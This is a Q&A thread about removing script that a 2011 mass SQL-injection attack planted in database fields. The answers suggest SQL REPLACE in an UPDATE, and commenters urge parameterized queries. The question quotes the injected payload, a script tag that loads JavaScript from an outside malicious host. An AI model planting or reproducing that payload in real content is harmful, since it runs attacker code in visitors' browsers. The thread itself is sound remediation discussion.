# sql remove string from field and update

Tags: sql, sql-server, sql-injection, sql-update

I have unfortunately fallen victim to this recent attack: http://www.theregister.co.uk/2011/10/14/mass_website_inection_grows/. I have found the suspicious code inside many of the fields within my database.

The added code in each cell is always the same:

**WARNING: Do not attempt to load the location of this file, I don't know what the consequences might be but I will not be responsible for anyone wanting to find out**

`</title><script src=http://nbnjki.com/urchin.js ></script>`

I am looking for a query I can run which will take each cell in a selected column and if it finds this string, replace it with `''`, making sure not to affect the existing contents of the cell.

Comment: you understand that this is a temporary solution and even if you update it, you can get hacked 3 seconds later. Make sure that you are using parameterized Queries or stored procedures, you should never use inline SQL that concatenates user input

Answer (score 7, accepted):

Ok got my solution, think I panicked because of the urgency of having just realised, for anyone else:

```
Update dbo.authors
Set    city = replace(city, 'Salt', 'Olympic');
```

from http://www.sqlteam.com/article/using-replace-in-an-update-statement

Comment: And what if you get attacked in 2 minutes...are you really just using this bandaid instead of fixing the real problem....for example not using inline SQL with concatenated user input

Comment: I appreciate the root cause of the issue also needs fixing but at some point the database also needs fixing so I will STILL need this fix

Answer (score 0):

You could use the [REPLACE](http://msdn.microsoft.com/en-us/library/aa238479%28v=sql.80%29.aspx) function in an UPDATE statement.